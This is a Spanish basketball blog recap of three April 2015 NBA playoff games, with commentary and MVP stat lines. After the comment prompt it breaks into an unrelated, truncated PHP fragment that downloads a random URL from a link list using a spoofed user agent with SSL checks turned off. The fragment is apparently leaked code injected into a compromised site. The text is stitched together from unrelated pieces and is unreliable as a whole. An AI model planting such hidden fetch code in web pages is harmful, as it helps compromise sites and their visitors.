La Crónica: Dies irae

25 de April de 2015 por TheDeerHunter

Baño de los vigentes campeones a los Clippers, con una defensa que recordó a la de sus mejores tardes, con el insigne Defensive Player of the Year descomunal. Las otras dos eliminatorias que se derimian anoche se colocan en situación de sacar la escoba a pasear. Los Rockets se llevaron una agónica victoria del partido de locos que plantearon en Dallas y los Raptors se mostraron impotentes ante su bestia negra, Paul Pierce. Vayamos al detalle.

Rockets 130 – Mavericks 128

Partido antinatura donde ambos contendientes decidieron brindarnos un correcalles más propio de un patio de colegio que de una una eliminatoria a vida o muerte. Cuesta creer que en una cancha donde están presentes jugadores como Tyson Chandler, Corey Brewer, Dwight Howard o Al-Farouq Aminu se permita un esperpento defensivo como el de anoche. Los Rockets apuntaban a proyección de +160 puntos terminado el primer cuarto, pero dando todas las facilidades del mundo para que los Mavs no perdieran comba en la fiesta. Casi 180 lanzamientos a canasta entre los dos, 1 cada 16 segundos aproximadamente. Eso sí, con altos porcentajes de lanzamiento como no podía ser de otra manera. Faltó cantar aquello de “que se besen”. A todo esto, y no sabría decir si era lo de menos, James Harden le ganó la partida a Monta y Dirk con sus 42 puntazos. Hubo un tiempo en que teníamos a Carlisle como barraquero. Qué cosas.

MVP: James Harden 42 puntos (5 de 7 en triples) 5 rebotes 9 asistencias.

Raptors 99 – Wizards 106

Anticipábamos una serie larga e igualada, pero no contábamos que los Raptors se iban a dar un tiro en el pie de tal calibre. Por segundo año consecutivo Lowry tira su actuación en playoffs por el retrete, tras una brillante regular. Se han contagiado de su inoperancia pesos pesados como Louis Williams y Greivis Vasquez en lo que teníamos todos por un perímetro de élite. Sólo DeRozan trató de salvar los muebles con 20 puntos sólo en el primer cuarto, récord de la franquicia. Los Wizards se limitaron a controlar las frustraciones rivales dejando a Pierce dar la puntilla con 3 triples en los últimos 6 minutos, de los 4 que metió en toda la noche.

MVP: Marcin Gortat 24 puntos, 13 rebotes, 5 asistencias y 4 tapones.

Clippers 73 – Spurs 100

Poca historia. Los campeones celebraron el DPY de Kawhi Leonard dando una lección magistral que los Clippers tardarán en olvidar. Al mismo tiempo Leonard se encargó de demostrar que está lejos de ser “tan sólo” un especialista defensivo en una actuación total. La devacle angelina queda retratada por las lamentables actuaciones de Paul y Crawford. Sin perímetro todo fue más fácil para los hombres de Popovic. Todo el último cuarto sobró y pudieron hacer las rotaciones oportunas a la espera de mejores ocasiones para plantear verdadera batalla.

MVP: Kawhi Leonard: 32 puntos, 4 rebotes, 3 robos, 2 tapones, 1 asistencia… en 29 minutos.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>